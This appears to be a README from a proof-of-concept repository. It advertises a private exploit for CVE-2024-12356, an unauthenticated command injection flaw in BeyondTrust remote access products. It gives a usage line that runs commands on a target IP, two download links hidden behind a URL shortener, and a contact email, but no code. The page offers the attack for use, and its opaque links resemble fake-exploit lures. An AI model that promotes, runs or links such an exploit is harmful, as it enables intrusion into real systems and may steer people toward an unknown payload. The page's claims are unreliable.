CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)# CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)
## Overview
A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user. This is a command injection vulnerability, classified under CWE-77 (Improper Neutralization of Special Elements used in a Command).
## Details
+ CVE ID: CVE-2024-12356
+ Published: 2024-12-16
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.8
+ Vendor: **BeyondTrust**
## Exploit
**[Download Here](https://bit.ly/3OZPYhj)**
## Vulnerability Description
The impact of this vulnerability is severe. It allows unauthenticated attackers to execute arbitrary commands with the privileges of a site user. This leads to unauthorized access, data breaches, system compromise, and full control over the affected systems. The attack vector is Network-based, requires no user interaction, and has low attack complexity, making it relatively easy for attackers to exploit.
## Usage
```
python CVE-2024-12356.py -h 10.10.10.10 -c 'uname -a'
```
## Affected Versions
**affected from 0 through 24.3.1**
## Exploit
**[Download Here](https://bit.ly/3OZPYhj)**
## Contact
For inquiries, please contact cloudefence@thesecure.biz
[4.0K] /data/pocs/2b284838648f55597905c81fcc1b49c83f9cacdf
└── [1.4K] README.md
0 directories, 1 file